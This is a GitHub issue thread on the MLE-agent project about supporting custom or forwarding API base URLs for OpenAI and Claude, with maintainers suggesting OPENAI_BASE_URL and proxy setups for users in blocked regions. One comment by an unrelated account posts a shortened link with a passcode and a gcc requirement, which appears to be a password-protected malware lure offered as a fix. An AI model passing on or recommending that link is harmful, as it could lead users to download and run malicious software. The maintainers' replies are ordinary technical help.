### ISSUE TITLE
api url changes

### ISSUE THREAD

**Issue by xuxiaoooo** [MLSysOps/MLE-agent#174]
Can OpenAI and Claude support forwarding api url changes

**Comment by xuxiaoooo** [comment]
If this functionality is already available, can you advise how to modify it? I've tried but it's more complicated to report errors.

**Comment by maiarafag** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler

**Comment by leeeizhang** [comment]
> Can OpenAI and Claude support forwarding api url changes

Do you mean that you need to modify the OpenAI base_url? While this feature is currently not supported in MLE-agent, you may attempt to use `export OPENAI_BASE_URL=https://...` as referenced in the documentation at https://platform.openai.com/docs/api-reference. We will consider incorporating it in future updates. Thank you!

**Comment by HuaizhengZhang** [comment]
> Can OpenAI and Claude support forwarding api url changes

could you show us one example? 

thanks a lot for testing our tool

**Comment by huangyz0918** [comment]
I think it refers to using the GPT/Claude models with a proxy server and a customized URL since some regions (e.g., China mainland) are blocking the requests from openAI. reference: https://github.com/KenyonY/openai-forward

**Comment by HuaizhengZhang** [comment]
> I think it refers to using the GPT/Claude models with a proxy server and a customized URL since some regions (e.g., China mainland) are blocking the requests from openAI. reference: https://github.com/KenyonY/openai-forward

hmm. got you! never thought this before

**Comment by xuxiaoooo** [comment]
> I think it refers to using the GPT/Claude models with a proxy server and a customized URL since some regions (e.g., China mainland) are blocking the requests from openAI. reference: https://github.com/KenyonY/openai-forward

He is right, and for example, the Chatbox provides the kind of function.

**Comment by huangyz0918** [comment]
> > I think it refers to using the GPT/Claude models with a proxy server and a customized URL since some regions (e.g., China mainland) are blocking the requests from openAI. reference: https://github.com/KenyonY/openai-forward
> 
> He is right, and for example, the Chatbox provides the kind of function. Also, I think this feature is very useful for users in mainland China, which will attract a large number of users.😄

Thank you for your feed back ❤️ We will add this support very soon!
